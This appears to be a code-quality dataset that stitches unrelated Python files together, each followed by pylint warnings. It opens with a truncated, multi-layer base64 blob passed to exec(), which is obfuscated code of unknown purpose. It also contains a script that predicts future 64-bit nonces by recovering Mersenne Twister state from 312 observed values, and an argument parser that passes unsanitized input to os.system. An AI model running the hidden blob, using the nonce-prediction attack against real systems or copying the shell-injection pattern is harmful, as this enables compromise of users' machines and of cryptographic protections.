KdVFrUlVhMXAzVTBVeFZtUkhkRmRpUm05M1ZrUkdWMVl4V25OYVJWcFRWMGRvV0ZSWE5XOWpiRlp4VTJ4a1YySlZjRWRXYlhNeFZUQXhjMU51WkZoV00yaFVXVEl4VjJNeFZuSmhSVGxZVWxSV2QxWlhNSGhPUm1SelZsaG9WMVpGV2xSVmJUVkNUV3hXV0dSRVVsZFNiVkpKV2xWVk5WZHNXWHBWYm5CVllrWndWRll3WkU5U2JVNUlaVVprVjFKV2J6QldiRkpIWWpKTmVGVnVVbE5pYTNCd1ZXdGFZVlpzV25OVmJHUlRWbTE0TUZremNFZFViVXBJVld4YVZrMXFWak5YVmxWNFZteE9jMVpzV2xkbGJGbDZWMVphVm1WSFRuSk9WbXhwVW0xb2NGVnFTbTlXUm1SeVYyMTBWV0pXV2xkVU1WcHZZV3hKZVdGRk9WcGhNWEI2VkZSR1YwNXNSblJQVmxaT1lrVndObGRXVWs5ak1rVjRVMWh3YUZORmNGZFdNR2hEVjBaV1ZWSnNaR3RTTVVreVZtMTRVMkZXU25KalJGWlhZbFJGTUZacVJsTldNVXBaV2taU2FHSklRbWhYVm1Rd1pERldSMkV6Ykd4VFIxSlpWbTE0WVZkc1duUmxSMFpWWWtWd1NWcFZWbUZXTVdSSlVXdGtWV0pHY0V4V2FrWlBWMWRHUjFWdGFFNVRSVXBZVm0xNFUxTXdNVWRWV0doVFYwZDRUMVpzYUZOVlJscHhVbXQwVkZac2NEQlViR2hyVmtkS1JtTkZXbFpXZWtGNFZqSnplR05XU25KaFIwWlRZa2hCZWxaVVFsWk9WbVJYVm01S1RsWXllRlJWYWs1U1RVWlplRlZyY0d4U2EydzFWbGQ0YTJGc1NsaGhSa1pYVFVad1RGWkdXbGRqYkZwelYyMTBUbFpyV1RCV2JHUXdVekpHYzFOc1pGUmlSVFZoV1ZkMGQwMHhWWGxOVm1SWFlYcEdXbFZ0ZUZOWFJrbDZZVVpDV0ZadFVYZFpla0V4VmpGV2MyRkhjRk5YUlVwNlZtMTRVMUl5VmtkV2JrcFlZVEpTY2xscldrdGxWbHBJVGxaT1ZsSnRVa3BWVjNNeFYyMUtXVlJZWkZWV2JIQjZWRzE0VTJNeFVuUmlSazVPVTBWS1YxWnFTbmRUTWsxNFdraEtUbGRHV205Vk1GVXhWMVphZEUxWE9WUk5WM2hZVm0xd1ExWnRSalpTYTJSaFVsZFNlbFpIYzNoU1ZrcFpZVVpvV0ZORlNsRlhXSEJMVmpKU1IxWnVTbWhTYlZKd1dXdFdkMVJzV2xkVmEwNXJUV3hLU0ZscldtdFpWa2w2Vlc1R1ZWWnRhRVJXTW5oaFZqRndTR1JHV2s1V1dFSlpWbFJLZDFNeFpISk5TR3hzVWxaS1YxWnVjRWRXUmxWNFYyeGthMUl3V2toWk1GVXhZVmRHTmxacVRsZFhTRUpJVlcweFVtVkdVbGxpUmxab1RXNW9WbGRYTVRCVE1rNUhZa2hTYkZKWFVsWlVWbFpYVGxaU2MxWnJPV2xTYkd3elZqSjRjMVpYU2tkVGExSldUVzVvUjFwRVNrOVNiRkowVW14T2FWWXlhRlpXTVdSM1V6Rk9kRlp1VGxWaVIyaG9WV3hvUTFVeFVsWldiRnBzVm14V05GWnRlR3RXYXpGWFVtcE9XbUV4V21oV1IzaGhZMnhPYzFWc1dtbFdSVVY0VjFSQ1lWTXhTWGhUYmxaaFVqTlNUMWxZY0Zaa01XUllaRWM1VjAxclZqUlZiR2hyVlRKS2NsTnNhRlZXYlZKUFZGWmFVMVl4V25WVWJFNU9WbXh3TkZaWE1UUmtNa1pYVjI1T1dHSnNXbGhWYTFaM1pXeFdWVkpyZEZkTlZsb3hWVmQ0UzJGSFZuTlhiR1JYVW14YWFGVjZTa2RTTVZKellVWndUazFzU2xaV1JtUjZUVlpPYzFaWWJFOVdWVFZ2Vm1wQ2QyVnNWblJOUkVaWFVteHNObFpYTVc5WGJGcFhZMGhzWVZac2NHaGFSV1JMVTBkS1JrNVhhR2xYUjJONFZteFNSMVl4VlhsVldHaFlZVEpTY0ZWdE1XOVdNVnB4VTJ4T1YwMVdTbGRXYlRWUFlWZEtSazVXYkZoV1JUVnlWbXRWZUdOck5WWmpSbHBPWVd4YVJWZFdXbXRUTWsxNFUyNUtVRlpyY0U5WlYzUmhUbXhrY2xWclRtcE5WWEJYVkZaV2IxbFdTWHBSYmtKWFlrWndlbFJ0ZUZwa01WWnlaRWR3VG1KRmNGcFdhMlF3WXpGWmVWSnVTbFJoZWtaWFZtdFdTMDB4VmpaU2JVWlhZa1pLZVZaSGVHdFdNa3BaWVVkR1YxWkZiRE5VVmxwelZqRndSbHBHVG1sV1JscFhWa1pqZUU1R1JYaGlSbVJYWVd0S1YxbFljRWRTTVhCR1draGtWazFzV2pCYVNIQkhWMGRGZUZkc1FsWldNMDB4Vm0weFMxSnRSa2hpUmxKVFlraENORlpzVWtOWlZtUjBWVmhvVlZkSFVsWlpWRTVUVmpGYWNWRnVUazlpUmxZMVdUQldUMVpIU2taV2FrNVdZbFJCZUZacldtRldhelZXVkd4b2FHRXdjRFpXVjNoclUyMVdWMk5GV21wU01taFlWRlJHUzFWV1dsZFZhM1JvWWxaR05GWkdhSE5XUm1SSlVXeGFWMDFHY0doWk1WcFRWbFpPY1ZWck9XbFRSVXBJVmpKMFlXRXlSWGhUYkd4V1lURmFWMVJYY0VkTk1XeFhWMnR3YkZKdFVqQlVNVnAzVkcxS1dXRkZlRmhXUlVwWVZsUkdWMlJHVW5KaVJtaHBWMFZLZWxadGRHRlhhekZ6V2toT1dHSlViRlpVVlZKSFUwWnJkMWR0T1ZWaVJXOHlXV3RXTUZkdFNrZGpSRTVoVWtWYWNsa3hXazlqVmxaMFlrWk9UbFpZUWtkV2JGcHJUVVpOZVZKWWFGVmhNbEpWV1d4U2MxZFdXbkpXYm1SUFlrZFNlRlZ0ZUdGaVIwcEhWMnBDV2xaWFVqTlpWbVJMVW0xT1JWUnNhRmRsYTBrd1YxWmplRkl4V25SVmEyUlVZWHBXVkZZd1drdGxSbHBWVVd4a2EwMXNSalJaYTJoVFZERmFjbU5IYUZWV1YxRXdXbGQ0YzA1c1RuUmtSbEpwVWxaWmVsWlhNSGROVmxwSFYyeGFUMVpWTlZsWlYzUkxaV3hXY2xkclpGaFNia0pIV1RCYVMxUnNTbGRqUkVaWFZrVmFXRlpFUmtkak1rbDZXa2RzVTFacmNGUldiWEJMVlRGTmVGWnVVbXBTVlRWd1dXdGFTMVl4V2tobFIwWmFWbFJHU1ZwVmFGZFdWbHBYVjFoa1dsWkZXa3RhVm1SWFVsWkdjMkZIYkZOV1JVa3dWako0YW1WR1RYaFVhMlJZWW14S2MxVnFUa05WTVZKWVRWVTVUMUpzV1RKVmJYUmhZVEF4VmsxVVZsZFNNMUo2Vm10a1MyTnNUblZSYkhCcFYwZG9TVmRYTVRSVU1XUklWbXRzYWxKclNsaFpWRUozVmpGYVIxWnNUbXBOVmxwWVZteG9hMVV5U2xWV2JGWlhZa1pWZUZWVVJtdGpWa1oxVkd4T1UyRXhjRnBXTW5SWFpERldjazFWV2xoaWJGcFhWRlphWVZWR1ZsaGxTRnByVFd0d1IxZHJWVEZWTURGelUyeENXRlp0VVRCV2FrcE9aVVpTYzJGR2NFNU5iRXBXVmtaa05GTXhUbGRpU0Vwb1VtczFZVlp0ZUZwTmJGcDBZMGRHV0dKVlZqVldWM2h2VjIxRmVWVnNRbFpoTVhBelZHMTRTMk50VmtkWGJHUlRWbGhDVDFacVJsTlJNa2w0VkZoc1ZXRXlhRlZaYlhoaFZqRmFjVk5zVGxSTlYzaDVXVlZWTVZReFduTlhhMmhYVm0xb2NsWlZXbUZqYkU1elYyeFdWMVpyY0RaV2JGcGhXVlpLVjFKc1ZsZGlSa3BZVm14U1YxSkdXWGxqUlU1cVRWVndTRlZ0ZUc5WlZrcFpVV3hPVlZaV1dtaGFSbHBXWlVaYWMyTkhkRTVXZW10NlZrZDRZVll4Vm5OWFdIQm9VbGhTV1ZsdE5VTlNSbHBHVjI1a1UySklRa3BXUnpFd1ZUSktjbE5zV2xkU00yaDJXa1JLUjFZeFRsbGhSbWhwWVhwV2FGWkdWbFpOVjFKWFZXeGtWMkZyU2xkWldIQkhVakZ3UmxwSVpGZFNhM0JhVlZkd1QxZEdXalpSV0doWFZqTm9NbHBFU2t0VFZsSjBZMGQ0YVZkSGFGUldiVEV3VlRGR2NrNVdaRmRoTWxKWFZqQmtVMVZXV25Sa1JYUlhZa1pLVjFaWE5VOVdiRnB6WTBWYVZsWnNTbGhXYlhoTFl6RktjVlJzYUdoaE1IQTJWbGQwWVZJeFpFZGpSVnBxVW1zMWIxbFVRbmROVmxweVdYcEdhMDFXY0RCVk1uUmhZVlpLTmxack9WWmlSMmhVV1RKNFYyTldUbkZWYXpWVFlsWktObFpyV2xOU01rcElVMnhhYWxKWGVGaFpiRkpHVFVac1dHVkZXbXhXYlhRMldWVmFVMVJzV2xkWFdIQlhWMGhDVEZaRVJrOVdNVkoxVm14S2FWWXphSGRYVjNSWFdWZFNWMVpZYUdGU1JrcHpXVmh3YzFkR1ZsaGxSbVJWWWtWd1NWcFZXa3RXTWtWNFUydE9WV0pHY0ZoVmFrWlhWMVp3UjFGc1pHaE5TRUpZVm10YVYxVXlUWGhXYkdSWVlURmFVMVpyV21GV01WWjBaVVZrVGsxV1JqUldNblJQVmpBeFJWSnJiRmhoTVZWNFZtcEdTMVpzWkZsalJscE9ZbTFvVVZaVVNqUlZNazV6Vlc1V1YySkdjSEJaVkVKM1pERmFkR05GWkZkTlJFWllXV3RTWVZaSFJuTlRia0pXWWxSV1JGWXllRmRXTVd3MlZteFdhVlpzY0ZwWGExWldUbFpXY2sxWVJsZGlSVXBoV1ZSS1UxUkdjRWRYYkdSWVVtNUNTRlZ0ZUdGVWJFcFhZa1JhVjFZelVtaFZha3BTWkRBeFNXSkdUbWhOYldoM1ZsUkNWazFYUmtkWGJGWlNZVE5TV0ZsclpEQk9WbEp6VjIxMGFGWnJjRlpaYTJoWFZsWmFWMWRZWkZaTmJtaEhXa1JHUzJSRk5WZFZiR1JYVmtaYVJsWXllR3BsUms1MFZteGtWbUpzV2xWWldIQkhZMFpzV1dOR1pHeGlSMUpaVkZWb2IxWnJNVVZTYTJ4V1RXNUNXRmxWV2twbFYxWkpWR3hrVGxKdVFrMVhXSEJIWTIxV2RGTnJWbFZpVlZwUFZUQmFTMU5zWkZoa1J6bG9UVlpLV0ZaSGRHRldSMFp5WTBkR1ZWWXpRbGhXVkVaeVpERmFjVkZzV21obGExcElWMnRXVjJReFZuSk5WVnBZWW14YVYxUldXbUZWUmxaVlUyeGthazFyTlVoWlZWVTFWakZLVm1ORmVGZFdNMUpVVlZSS1MyTXlTa1ZYYkZKcFVqRktlVlp0Y0VkVE1VcFhWbXhrYUZKWVVsVlphMVozVWpGYWRHTjZWbFpoZWtZd1dsVldUMWRIUm5KVGJuQldZVEZ3U0ZZd1duZFRSMDVIVkcxNGFWZEhUalJXYWtvd1ZqRlJlRkp1U2xCV2JIQndWV3hrTkZVeGJIUmxTR1JxVm0xNE1GcFZWbXRoVjBwR1RWUmFXbUV4V2t4WmExcExWakZPYzFSc2NHaGhNMEo1VmxSS05GSnRVWGhUYmxKUFZteEtXRlpxU205U1ZtUnpWMjEwVTAxWFVrZFViRnBYVlcxRmVsRnNUbFZXVjJoRVZtMTRXbVZYVmtoalJUVlhWa1ZhU0ZkWGRGZFZNVmw1VTI1V1VtRXpVbGRVVlZwaFZFWnNjVkp0ZEZkV2F6VjRWVmN4YzFVd01WWmpSVnBYVm0xU00xVlVTa2RYUmxwelYyeE9hV0Y2Vm1oV1JsSkxUa1pLUjFWc1dtRlNWMUpWVm0xek1VMVdXWGxOVkVKWFRVUkdlbFV5Y0V0WFIwVjRWMnhDVmxaRmNGTmFWbHBQVjFkT1IxVnRhR2hOU0VKVFZqRmFZVmxXYkZaT1dFNVZZa2RvY0ZWdGVIZGpSbEpZWXpOb1QxWnNjREJVYkZwcllVVXhWbFpxV2xwV1YyaHlWakp6ZUZKck5VVlJiVVpUVWxoQ1RGZHNaRFJVTWs1WFVtNUtiRkpzY0ZoVmJGWjNWR3hhVlZKc1pGVk5WVnA2V1dwT2EyRldTbGRUYkU1YVlsaFNURmxWV25OV01WcHlaRVUxVGxZemFEUldhMlF3VFVaU2MxTnNhR3hTVm5CV1ZteGFTMlZzVlhsbFJYUlRUV3RXTmxsVldsZGhWa3B5WTBaQ1YxSnNXbGRVYkdSTFkyc3hWbGR0ZEZOWFJVcFVWa1pXVjFsWFVsZFdXR2hYWVhwc1UxbHJZelZOTVd4eVZtNU9WbUpWY0hwWk1HaEhWMjFLV1dGRmFGcGlXR2hZVldwR1UyTnNUblJsUmtwT1VqTm5lbFpZY0VkU2F6bFhVV3hTVkZkRlNrMVdWbEYzVDFWc2NHRXpRV2xMVTJzOUlpa3AiKSk="))
12 - warning: exec-used
1 # your code goes here 2 import collections 3 T = int(input()) 4 print (T) 5 while T>0: 6 n,g,m = map(int,input().split()) 7 print (n,g,m) 8 dict = collections.defaultdict(set) 9 c = 1 ### guest no. 10 t = 1 11 li = [-1] 12 while c <=g: 13 h,direction = input().split() 14 print (h,direction) 15 h = int(h) 16 #h,direction = astr.split() 17 li.append((h,direction)) 18 dict[h].add(c) 19 print (dict) 20 c+=1 21 22 while t<=m: 23 c = 1 24 temp_d = collections.defaultdict(set) 25 while c<=g: 26 h,direction = li[c] 27 h = int(h) 28 if direction == 'C': 29 end = (h+1)%n 30 else: 31 end = (h-1) 32 if end<=0: ####3 33 end = n+end 34 temp_d[end].add(c) 35 c+=1 36 for i,v in temp_d.items(): 37 dict[i].union(v) 38 ################ 39 t+=1 40 41 dict2 = collections.OrderedDict() 42 for i,v in dict.items(): 43 for elem in v: 44 if elem not in dict2: 45 dict2[elem]=1 46 else: 47 dict2[elem]+=1 48 li1 = [] 49 print (dict2) 50 for i in range(g+1): 51 if i+1 in dict2: 52 li1.append(dict2[i+1]) 53 54 print (li1) 55 T-=1
37 - warning: bad-indentation 8 - warning: redefined-builtin
1 #!/usr/bin/python3 2 import os 3 main_nonce="nonce" 4 obj_file_new_nonce="obj_new_nonce_624" 5 cmd_cut='cat nonce | tail -312 > obj_nonce_312' 6 nonce_combined_list=[] 7 8 def split_nonce(): 9 10 os.system(cmd_cut) #This block will cut 312 nonce from main file and put in last nonce_312 11 file_nonce="obj_nonce_312" 12 13 with open(file_nonce, "r") as file: # Calculate hi and lo 32 bit of 64 bit nonce. 14 for line in file.readlines(): 15 line=int(line) 16 highint = line >> 32 #hi 17 lowint = line & 0xffffffff #lo 18 19 with open (obj_file_new_nonce, 'a') as file: #Add nonces to a new file making it 624 values. 20 file.write(str(lowint)+'\n') 21 22 with open(obj_file_new_nonce, 'a') as file: 23 file.write(str(highint)+'\n') 24 25 26 def predict(): 27 try: 28 os.system('cat obj_new_nonce_624 | mt19937predict | head -20 > obj_pred_10.txt') # Using Kmyk's Mersenne twister Predictor 29 except Exception as e: # This will through a broken pipe exception but it will successfully predict 10 next nonces 30 pass 31 32 with open('obj_pred_10.txt', 'r') as file: 33 nonce_array = file.readlines() 34 for i,j in zip(range(0,len(nonce_array),2), range(129997,130007)): 35 # if i <len(nonce_array)-1: 36 nonce_lo=int(nonce_array[i]) # Converting back to 64 bit. 37 nonce_hi=int(nonce_array[i+1]) 38 nonce_combined=(nonce_hi <<32) + nonce_lo 39 hex_nonce=hex(nonce_combined) 40 print("Predicted nonce at",j,"is:", nonce_combined, " [ Hex value:",hex_nonce,"]") #Printing the nones and their hex value 41 42 split_nonce() 43 predict() 44 45 46 47 48
10 - warning: bad-indentation 11 - warning: bad-indentation 13 - warning: bad-indentation 14 - warning: bad-indentation 15 - warning: bad-indentation 16 - warning: bad-indentation 17 - warning: bad-indentation 19 - warning: bad-indentation 20 - warning: bad-indentation 22 - warning: bad-indentation 23 - warning: bad-indentation 27 - warning: bad-indentation 28 - warning: bad-indentation 29 - warning: bad-indentation 30 - warning: bad-indentation 32 - warning: bad-indentation 33 - warning: bad-indentation 34 - warning: bad-indentation 36 - warning: bad-indentation 37 - warning: bad-indentation 38 - warning: bad-indentation 39 - warning: bad-indentation 40 - warning: bad-indentation 13 - warning: unspecified-encoding 19 - warning: unspecified-encoding 22 - warning: unspecified-encoding 29 - warning: broad-exception-caught 32 - warning: unspecified-encoding 29 - warning: unused-variable
1 import requests 2 import jenkins 3 from sqlalchemy import * 4 from sqlalchemy.ext.declarative import declarative_base 5 from sqlalchemy.orm import sessionmaker 6 import datetime 7 8 Base = declarative_base() 9 10 def connectToJenkins(url, username, password): 11 12 server = jenkins.Jenkins(url, 13 username=username, password=password) 14 return server 15 16 def initializeDb(): 17 engine = create_engine('sqlite:///cli.db', echo=False) 18 session = sessionmaker(bind=engine)() 19 Base.metadata.create_all(engine) 20 return session 21 22 def addJob(session, jlist): 23 for j in jlist: 24 session.add(j) 25 session.commit() 26 27 def getLastJobId(session, name): 28 job = session.query(Jobs).filter_by(name=name).order_by(Jobs.jen_id.desc()).first() 29 if (job != None): 30 return job.jen_id 31 else: 32 return None 33 34 class Jobs(Base): 35 __tablename__ = 'Jobs' 36 37 id = Column(Integer, primary_key = True) 38 jen_id = Column(Integer) 39 name = Column(String) 40 timeStamp = Column(DateTime) 41 result = Column(String) 42 building = Column(String) 43 estimatedDuration = Column(String) 44 45 def createJobList(start, lastBuildNumber, jobName): 46 jList = [] 47 for i in range(start + 1, lastBuildNumber + 1): 48 current = server.get_build_info(jobName, i) 49 current_as_jobs = Jobs() 50 current_as_jobs.jen_id = current['id'] 51 current_as_jobs.building = current['building'] 52 current_as_jobs.estimatedDuration = current['estimatedDuration'] 53 current_as_jobs.name = jobName 54 current_as_jobs.result = current['result'] 55 current_as_jobs.timeStamp = datetime.datetime.fromtimestamp(long(current['timestamp'])*0.001) 56 jList.append(current_as_jobs) 57 return jList 58 59 60 url = 'http://locahost:8080' 61 username = input('Enter username: ') 62 password = input('Enter password: ') 63 server = connectToJenkins(url, username, password) 64 65 authenticated = false 66 try: 67 server.get_whoami() 68 authenticated = true 69 except jenkins.JenkinsException as e: 70 print ("Authentication error") 71 authenticated = false 72 73 if authenticated: 74 session = initializeDb() 75 76 # get a list of all jobs 77 jobs = server.get_all_jobs() 78 for j in jobs: 79 jobName = j['name'] # get job name 80 #print jobName 81 lastJobId = getLastJobId(session, jobName) # get last locally stored job of this name 82 lastBuildNumber = server.get_job_info(jobName)['lastBuild']['number'] # get last build number from Jenkins for this job 83 84 # if job not stored, update the db with all entries 85 if lastJobId == None: 86 start = 0 87 # if job exists, update the db with new entrie 88 else: 89 start = lastJobId 90 91 # create a list of unadded job objects 92 jlist = createJobList(start, lastBuildNumber, jobName) 93 # add job to db 94 addJob(session, jlist)
3 - warning: wildcard-import 10 - warning: redefined-outer-name 10 - warning: redefined-outer-name 10 - warning: redefined-outer-name 12 - warning: redefined-outer-name 18 - warning: redefined-outer-name 17 - error: undefined-variable 22 - warning: redefined-outer-name 22 - warning: redefined-outer-name 23 - warning: redefined-outer-name 27 - warning: redefined-outer-name 29 - refactor: no-else-return 37 - error: undefined-variable 37 - error: undefined-variable 38 - error: undefined-variable 38 - error: undefined-variable 39 - error: undefined-variable 39 - error: undefined-variable 40 - error: undefined-variable 40 - error: undefined-variable 41 - error: undefined-variable 41 - error: undefined-variable 42 - error: undefined-variable 42 - error: undefined-variable 43 - error: undefined-variable 43 - error: undefined-variable 34 - refactor: too-few-public-methods 45 - warning: redefined-outer-name 45 - warning: redefined-outer-name 45 - warning: redefined-outer-name 55 - error: undefined-variable 65 - error: undefined-variable 68 - error: undefined-variable 71 - error: undefined-variable 1 - warning: unused-import
1 from datetime import datetime 2 import os 3 from sys import __excepthook__ 4 from time import time 5 from traceback import format_exception 6 7 8 BASE_DIR = os.path.realpath(os.path.dirname(__file__)) 9 10 def log_exception(type, value, tb): 11 error = format_exception(type, value, tb) 12 filepath = os.path.join(BASE_DIR, 'error.log') 13 old_text = '\n' 14 if os.path.isfile(filepath): 15 with open(filepath, 'r') as logfile: 16 old_text += logfile.read() 17 timestamp = datetime.fromtimestamp(time()).strftime('%Y-%m-%d %H:%M:%S') 18 line = f'[{timestamp}]\n{("".join(error))}' 19 new_text = line + old_text 20 with open(filepath, 'w+') as logfile: 21 logfile.write(new_text) 22 23 __excepthook__(type, value, tb)
10 - warning: redefined-builtin 15 - warning: unspecified-encoding 20 - warning: unspecified-encoding
1 """ 2 Command-line argument parsing. 3 """ 4 5 import argparse 6 #from functools import partial 7 8 import time 9 import tensorflow as tf 10 import json 11 import os 12 13 def boolean_string(s): 14 if s not in {'False', 'True'}: 15 raise ValueError('Not a valid boolean string') 16 return s == 'True' 17 18 def argument_parser(): 19 """ 20 Get an argument parser for a training script. 21 """ 22 file_time = int(time.time()) 23 parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) 24 parser.add_argument('--arch', help='name architecture', default="fcn", type=str) 25 parser.add_argument('--seed', help='random seed', default=0, type=int) 26 parser.add_argument('--name', help='name add-on', type=str, default='Model_config-'+str(file_time)) 27 parser.add_argument('--dataset', help='data set to evaluate on', type=str, default='Omniglot') 28 parser.add_argument('--data_path', help='path to data folder', type=str, default='/home/') 29 parser.add_argument('--config', help='json config file', type=str, default=None) 30 parser.add_argument('--checkpoint', help='checkpoint directory', default='model_checkpoint') 31 parser.add_argument('--test', help='Testing or Not', action='store_true') 32 parser.add_argument('--testintrain', help='Testing during train or Not', action='store_true') 33 parser.add_argument('--min_classes', help='minimum number of classes for n-way', default=2, type=int) 34 parser.add_argument('--max_classes', help='maximum (excluded) number of classes for n-way', default=2, type=int) 35 parser.add_argument('--ttrain_shots', help='number of examples per class in meta train', default=5, type=int) 36 parser.add_argument('--ttest_shots', help='number of examples per class in meta test', default=15, type=int) 37 parser.add_argument('--etrain_shots', help='number of examples per class in meta train', default=5, type=int) 38 parser.add_argument('--etest_shots', help='number of examples per class in meta test', default=15, type=int) 39 parser.add_argument('--train_inner_K', help='number of inner gradient steps during meta training', default=5, type=int) 40 parser.add_argument('--test_inner_K', help='number of inner gradient steps during meta testing', default=5, type=int) 41 parser.add_argument('--learning_rate', help='Adam step size for inner training', default=0.4, type=float) 42 parser.add_argument('--meta_step', help='meta-training step size', default=0.01, type=float) 43 parser.add_argument('--meta_batch', help='meta-training batch size', default=1, type=int) 44 parser.add_argument('--meta_iters', help='meta-training iterations', default=70001, type=int) 45 parser.add_argument('--eval_iters', help='meta-training iterations', default=2000, type=int) 46 parser.add_argument('--step', help='Checkpoint step to load', default=59999, type=float) 47 # python main_emb.py --meta_step 0.005 --meta_batch 8 --learning_rate 0.3 --test --checkpoint Model_config-1568818723 48 49 args = vars(parser.parse_args()) 50 #os.system("mkdir -p " + args['checkpoint']) 51 if args['config'] is None: 52 args['config'] = f"{args['checkpoint']}/{args['name']}/{args['name']}.json" 53 print(args['config']) 54 # os.system("mkdir -p " + f"{args['checkpoint']}") 55 os.system("mkdir -p " + f"{args['checkpoint']}/{args['name']}") 56 with open(args['config'], 'w') as write_file: 57 print("Json Dumping...") 58 json.dump(args, write_file) 59 else: 60 with open(args['config'], 'r') as open_file: 61 args = json.load(open_file) 62 return parser 63 64 def train_kwargs(parsed_args): 65 """ 66 Build kwargs for the train() function from the parsed 67 command-line arguments. 68 """ 69 return { 70 'min_classes': parsed_args.min_classes, 71 'max_classes': parsed_args.max_classes, 72 'train_shots': parsed_args.ttrain_shots, 73 'test_shots': parsed_args.ttest_shots, 74 'meta_batch': parsed_args.meta_batch, 75 'meta_iters': parsed_args.meta_iters, 76 'test_iters': parsed_args.eval_iters, 77 'train_step' : parsed_args.step, 78 'name': parsed_args.name, 79 80 } 81 82 def test_kwargs(parsed_args): 83 """ 84 Build kwargs for the train() function from the parsed 85 command-line arguments. 86 """ 87 return { 88 'eval_step' : parsed_args.step, 89 'min_classes': parsed_args.min_classes, 90 'max_classes': parsed_args.max_classes, 91 'train_shots': parsed_args.etrain_shots, 92 'test_shots': parsed_args.etest_shots, 93 'meta_batch': parsed_args.meta_batch, 94 'meta_iters': parsed_args.eval_iters, 95 'name': parsed_args.name, 96 97 }
56 - warning: unspecified-encoding 60 - warning: unspecified-encoding 9 - warning: unused-import
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer 2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow 3 4 import os 5 import numpy as np 6 import tensorflow as tf 7 from archs.maml import MAML 8 class Model(MAML): 9 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): 10 super().__init__(train_lr,meta_lr,image_shape,isMIN,label_size) 11 12 def dense_weights(self): 13 weights = {} 14 cells = {} 15 initializer = tf.contrib.layers.xavier_initializer() 16 print("Creating/loading Weights") 17 divider = 1 18 inic = 1 19 filters = 64 20 finals = 64 21 if self.isMIN: 22 divider = 2 23 inic = 3 24 finals = 800 25 filters = 32 26 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): 27 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) 28 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) 29 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) 30 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) 31 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) 32 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) 33 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) 34 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) 35 weights['d_1'] = tf.get_variable('d_1w', [finals,self.label_size], initializer = initializer) 36 weights['b_1'] = tf.get_variable('d_1b', [self.label_size], initializer=tf.initializers.constant) 37 38 """weights['mean'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) 39 weights['variance'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) 40 weights['offset'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) 41 weights['scale'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) 42 43 weights['mean1'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) 44 weights['variance1'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) 45 weights['offset1'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) 46 weights['scale1'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) 47 48 weights['mean2'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) 49 weights['variance2'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) 50 weights['offset2'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) 51 weights['scale2'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) 52 53 weights['mean3'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) 54 weights['variance3'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) 55 weights['offset3'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) 56 weights['scale3'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )""" 57 print("Done Creating/loading Weights") 58 return weights, cells 59 60 def forward(self,x,weights, training): 61 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") 62 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) 63 conv1 = tf.nn.relu(conv1) 64 conv1 = tf.layers.MaxPooling2D(2,2)(conv1) 65 66 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") 67 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) 68 conv2 = tf.nn.relu(conv2) 69 conv2 = tf.layers.MaxPooling2D(2,2)(conv2) 70 71 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") 72 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) 73 conv3 = tf.nn.relu(conv3) 74 conv3 = tf.layers.MaxPooling2D(2,2)(conv3) 75 76 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") 77 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) 78 conv4 = tf.nn.relu(conv4) 79 conv4 = tf.layers.MaxPooling2D(2,2)(conv4) 80 # print(conv4) 81 # bn = tf.squeeze(conv4,axis=(1,2)) 82 bn = tf.layers.Flatten()(conv4) 83 # tf.reshape(bn, [3244,234]) 84 85 fc1 = self.fc_layer(bn,"dense1",weights["d_1"],weights["b_1"]) 86 # bn = tf.reshape(bn,[-1,]) 87 return fc1
9 - warning: useless-parent-delegation 9 - refactor: too-many-arguments 9 - refactor: too-many-positional-arguments 38 - warning: pointless-string-statement 17 - warning: unused-variable 60 - warning: unused-argument 4 - warning: unused-import 5 - warning: unused-import
